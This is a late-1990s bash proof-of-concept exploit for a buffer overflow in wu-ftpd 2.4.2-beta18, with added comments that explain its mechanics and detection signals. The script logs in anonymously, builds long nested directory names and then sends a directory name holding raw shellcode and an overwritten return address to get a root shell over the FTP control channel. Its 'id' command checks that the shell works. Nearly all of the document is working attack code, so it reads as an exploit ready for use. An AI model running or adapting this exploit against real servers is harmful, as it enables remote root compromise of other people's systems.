#!/bin/bash
#
# (c) Lam3rZ
# !!!!!!!!!!!!!!!!!!!!!!!!
# (./skrypt.sh ; cat) | nc host 21
# !!!!!!!!!!!!!!!!!!!!!!!!
#
#
# tested on suse 6.0, wu-ftpd 2.4.2-beta18
# real-path: /export/ftp/incoming
# fix offset by editing print "A" after shellcode, 97 was good for me...
# it depends on real-path length 'fcoz
#
# What this file is: a late-1990s proof-of-concept for a buffer overflow in
# wu-ftpd's path handling, driven entirely over the FTP control channel.
# The script itself only prints FTP commands on stdout; the usage line above
# pipes that output into nc, and the trailing `cat` keeps the connection
# open so the operator can keep typing afterwards.
# Reviewer note (defensive): the trigger is the sequence of MKD/CWD commands
# below whose arguments are hundreds of bytes long and, at the end, contain
# raw non-printable bytes -- that combination on an FTP control connection is
# an unambiguous IDS/log signal. The author names 2.4.2-beta18 as the
# affected build; wu-ftpd releases after that addressed this overflow.
#
# 250-byte filler. Each mkd/cwd round below nests one more such directory, so
# the server's accumulated real path grows by ~250 bytes per round --
# presumably what pushes it past the fixed-size path buffer (the author's
# "depends on real-path length" note above says the same).
DDD=`perl -e 'print "A" x 250'`
# 20-byte filler for the last nesting step before the payload directory.
EEE=`perl -e 'print "A" x 20'`
# Payload directory name: shellcode, then 97 bytes of "A" (the offset the
# author says to tune), then the 4-byte little-endian value 0x080b1524 --
# presumably the saved return address being overwritten, hand-picked for
# the author's build. Reading the int 0x80 calls in the bytes (al = 0x46,
# 0x3f, 0x27, 0x3d, 0x0c, 0x0b) the code appears to do setreuid, dup2, a
# mkdir/chroot/chdir loop and then execve; the trailing "0bin0sh1..11BiBi"
# characters are patched in place at run time, which is how the payload
# avoids NUL, "/" and \xff bytes on the wire (see the author's \xff note).
FFF=`perl -e 'print "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xbe\xab\x15\x0b\x08\x31\xc0\x31\xc9\x8d\x5e\x01\x88\x46\x04\x31\xc9\xb5\x02\x66\x49\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcc\x80\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x42\x69\x42\x69";print "A" x 97; print "\x24\x15\x0b\x08"'`
# nice shellcode, isn't it? :)
# by bulba 'fcoz... there is no \xff 'coz that fuqn wu will kick off that char
# Anonymous login, then move into the writable incoming directory named in
# the "real-path" line above.
echo user ftp
echo pass ftp@ftp.pl
echo cwd /incoming
# Three rounds of "create a 250-byte directory, enter it": this is what
# lengthens the server-side real path.
echo mkd $DDD
echo cwd $DDD
echo mkd $DDD
echo cwd $DDD
echo mkd $DDD
echo cwd $DDD
# Blocks until a line arrives on the script's stdin (the terminal, in the
# documented invocation) -- presumably a manual pause so the server has
# processed the commands above before the payload is sent; confirm.
read
echo mkd $EEE
echo cwd $EEE
# The overflowing step: the payload directory is created, then entered.
echo mkd $FFF
echo cwd $FFF
# Sent to whatever is now on the far end of the control connection; the
# author uses the reply to "id" as the success check.
echo id